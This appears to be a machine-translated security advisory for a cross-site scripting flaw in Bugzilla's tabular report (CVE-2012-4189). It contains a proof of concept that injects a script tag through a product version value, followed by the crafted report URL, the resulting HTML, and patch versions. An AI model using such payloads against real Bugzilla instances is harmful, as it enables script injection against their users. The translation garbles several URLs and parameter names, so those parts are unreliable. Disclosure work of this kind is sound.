Bugzilla tabular report field value error escape Cross-Site Scripting Vulnerability

Release date:
Updated on:

Affected Systems:
Mozilla Bugzilla 4.x
Mozilla Bugzilla 3.x
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56504
Cve id: CVE-2012-4189

Bugzilla is an open-source defect tracking system that manages the entire lifecycle of defects in software development, such as submitting, repairing, and disabling defects.

Bugzilla does not properly filter Field Values in the tabular report. Attackers can exploit this vulnerability to inject code, resulting in cross-site scripting.

<* Source: Mateusz Goik

Link: https://bugzilla.mozilla.org/show_bug.cgi? Id = 790296
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

PoC:

Http: // localhost/cgi-bin/bug/editversions. cgi? Action = add & product = TestProduct->
Version: "> <script> alert (1); </script>

Add new bug to "TestProduct" with version "> <script> alert (1); </script>

Http: // localhost/cgi-bin/bug/query. cgi? Format = report-table->
Horizontal Axis: Version
Shocould be the results: Version: "> <script> alert (1); </script>
-> Generate Report

Http: // localhost/cgi-bin/bug/report. cgi? X_axis_field = version & region = & query_format = report-table & region = allwordssubstr & region = & resolution = --- & longdesc_type = allwordssubstr & longdesc = & region = allwordssubstr & bug_file_loc & keywords_type = allwords & keywords = & deadlinefrom = & deadlineto = & bug_id = & bug_id_type = anyexact & version = % 22% 3E % 3 Cscript % 3 Ealert % 281% 29% 3B % 3C % 2 fscript % 3E & types = 1 & emailtype1 = substring & email1 = & types = 1 & emailreporter2 = 1 & emailcc2 = 1 & emailtype2 = substring & email2 = & emaillongdesc3 = 1 & emailtype3 = substring & email3 = & chfieldvalue = & chfieldfrom = & chfieldto = Now & j_top = AND & f1 = noop & o1 = noop & v1 = & format = table & action = wrap

Result:

+ OColumn. field + "& amp; version ="> <script> alert (1); </script> '>"
ElLiner. innerHTML = "<a href = 'buglist. cgi? Action = wrap & amp; resolution = --- & amp; version = "> <script> alert (1); </script> '>"
<A href = "buglist. cgi? Action = wrap & amp; resolution = --- & amp; version = "> <script> alert (1); </script>"> 5 </a>
<A href = "buglist. cgi? Action = wrap & amp; resolution = --- & amp; = % 20 & amp; version = "> <script> alert (1 ); </script> "> 5 </a>

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Mozilla
-------
The vendor has released patch 3.6.12, 4.0.9, 4.2.4, and 4.4rc1 to fix this security problem. Please download the patch from the vendor's homepage:

Http://www.mozilla.org/security/